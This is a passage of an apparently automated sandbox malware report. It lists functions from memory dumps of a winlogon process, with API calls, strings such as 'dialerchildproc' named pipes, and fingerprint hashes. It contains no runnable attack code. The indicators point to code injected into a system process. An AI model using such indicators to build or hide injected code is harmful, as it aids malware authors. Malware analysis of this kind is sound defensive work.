536->542 541->519 542->519 544->545 556 1f385b96a2d-1f385b96a3b 544->556 545->479 551->515 556->545 557->507 558 1f385b969e7-1f385b96a04 call 1f385b9abc8 557->558 558->507
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 4409f07fb228c0d555485b01c2f5db390ec7bc0f911a69b9524e815b9d6d2938
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 6081AB3160060386FAD39F6594413F966A1ABE57E0FA48235BE25477DEFB3CCB468701
                                                        Function 000001F385BCCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 000001F385BCCE37
                                                        • FlsGetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCEBC
                                                        • SetLastError.KERNEL32 ref: 000001F385BCCED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,000001F385BCECCC,?,?,?,?,000001F385BCBF9F,?,?,?,?,?,000001F385BC7AB0), ref: 000001F385BCCF2C
                                                          • Part of subcall function 000001F385BCD6CC: HeapAlloc.KERNEL32 ref: 000001F385BCD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF54
                                                          • Part of subcall function 000001F385BCD744: HeapFree.KERNEL32 ref: 000001F385BCD75A
                                                          • Part of subcall function 000001F385BCD744: GetLastError.KERNEL32 ref: 000001F385BCD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF76
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: ab4e86b80bad7de7d9fc3ab59b2f76ba8cf21dcb8283221406096f04f5b2af92
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: A9415D3024168786FAEBA73555553F926829BF67F0F280734BD36466EEDE2C9F018608
                                                        Function 000001F385BC2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: b1f9f93cb01f113d9316950de3058d2bf3c52726d10c2abd083118da5a752f1a
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 9B213D3261464286EB518B25E4443A963A0F7D9BE4F944325FEA903BE8CF7CC649CB04
                                                        Function 000001F385BF9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 118cde429f331ccbb9c347859f0b6c357bc9266cc281f8d3d7d51a4fe7ca9d13
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: E4E19E3260474287EBA59FA5D4813ED77A1F7A57E8F100225FE6997B9ECB38C291C700
                                                        Function 000001F385B99944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 89869763d31d70a6664f7afe8390858ba70db1f617f2886a7312f5174378804d
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: BCE1AE32604B4286EBE29B25D4813FD37A1F7E57E8F100225FE6957B99EB38C290C741
                                                        Function 000001F385BCA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: aaf1cc35d11ae05a2632683eb1bd403c02529057552cc08f6e5be18958e980d5
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 9BE1A07260474186EBA2DF65D4813ED77A0F7A4BE8F100225FEA957BD9CB38DA81C704
                                                        Function 000001F385BCF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: d636cb6fcfe5ac36cb180e2c1fe7e0ac221cfd02b4f72b76c9f1893fc7a1ecf8
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: E141BF32311A0291EA97CB16A8007F52395FBA5BF0F594375BD2A877CCEA3CCA458308
                                                        Function 000001F385BC104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 01501970025b8a16af69953ccfeb273e0ae5138ac2b6fb46539807bede4d7400
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: EA417E32214B85C6E7A1CF61E4443AA77A1F398BD8F548229EE991779CDF3CC945CB00
                                                        Function 000001F385BCD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD087
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 7b0f6b2b2c262150a3e5074f4c0839de0ecc50569b3260bde6390161f78a9210
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 66111C347042C645FAFBA72959523F962419BE47F0F6847B5BC39466EEDE2CCF028608
                                                        Function 000001F385BC7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: ef941430167cb6942911e2266a7754952b4ee9def37cad19c030d044e1fadb84
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 27818B7161060386FBD6AB2A94413F96290AFE57E0F544639BE38477DEDA3CCF498708
                                                        Function 000001F385BC9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: f2fc9e50d80dcf80fc4ca459e6f8d64556b7fcd08f0b3d7ca7df50233bdedf36
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 1A31B031212A02D1FE979B42A4007F42295B7A9BF0F590735BD394B7D8EF3CDA498308
                                                        Function 000001F385BD3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: 24ee0d3c3fdf8dc854bf28b68e46fc9f908ee672aa9e0ff533891e641e7e60b3
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: E2115E31210A4286E7918B56E84436966A0F7E8FF4F544334FE6A877D9CB7CCA148740
                                                        Function 000001F385BC2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 9479a4e4da195d168078971477690de0f7ba99455b5b0671873ad8e27db6120e
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: CF31B736701B5682EE96CF56D5407B9A790FBE4BE0F484230BE9847B99EF3CC9618704
                                                        Function 000001F385BCCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 69f9c49218e6240ed086ec77233dbfdd9bb5dabba28c9c0c825df301cb3e1b49
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: A0116D342406C286FAEBA72555553FD6242ABF47F0F644774BC3647ADEDE6C8F018608
                                                        Function 000001F385BC199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 6c8d3d93d8bfe3e2fe73925eee48ded896e6dd9d42efc55a8fd521349c15dbea
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 87016D31300B4282EB95DF52A4483A963A1F798BD1F984135FE6953798DF3CCA49C700
                                                        Function 000001F385BC36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 7d372f96bd39070a0a19211413c30f0155ca6cd9137a14114fdefad3a2692b6c
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: 4001A134201B0282EFA69F51E8087A563A0BBA4BE1F440635ED69073D8EF3CC6048704
                                                        Function 000001F385BC8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction ID: 287f6c13025e1d40a38e87b4e27fb4647a666ef3d6ef84ad5c099290c8d91569
                                                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction Fuzzy Hash: 73518232201602DAF7968B15D449BA93756F3A4BE8F618234FE264778CDB39EE41C708
                                                        Function 000001F385BC1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: bc5ae32632339b533cef1b2197eac90a425d8e38398b469f5566d1ddc85980dc
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: E4F0363230464292E7A18F15E8847A96760F7987E8FD44130FE594759CDA2CC74DCB04
                                                        Function 000001F385BCBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 8d4205d73ecca294230dc073d23a78a6a4ff33a72a55b65ea912a8e03c6c850f
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: CCF0627121160681EB558F24E4443FA6320FBE47F1F940329FE7A461E8DF2DC7488340
                                                        Function 000001F385BC3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 08e43dfad6d8615d8f85c57d7ba3ea724eca04319fcf64bf6a9629f1effc9644
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 48F08231704B8682EA818F17B9142B96260AB98FF0F884230FE6607B9CDF3CC6458700
                                                        Function 000001F385BC5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                        • Instruction ID: 7c2467fcd7596e74ea46f889efb0ad8b7ca6e31623e23edea5d0d94c658ca5ce
                                                        • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                        • Instruction Fuzzy Hash: 4C61B936519B41C6EAA1CB15E44436A77A0F3E87E5F501236FA9D47BE8DB7CCA408F04
                                                        Function 000001F385C03504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 2241a7eeb7cf42f6862469b93fdda74b784df1d8e04a5361b92d205a9f787443
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 0E11A333A14E1311FAE4166AE4553F931B06BD8BF5F588738BD76562FECA2CCB414A00
                                                        Function 000001F385BA3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 794d2f98abea2925b2b8cede53a2b7d91a83073eef87499136fa15848af996f8
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 01119E32A12B1311FAE7152CE8563F919C06BF83F5F788738BD76062EE9A2CCA415600
                                                        Function 000001F385BD4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: b511d5ba25b715f1dcfcca7696c36e76f84fb4604d3e81650d778d100f02beee
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: DD11513AA10E9331FAEA1768D4563F519516BF83F8F280734BD76066DE8AACCA454600
                                                        Function 000001F385BFF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
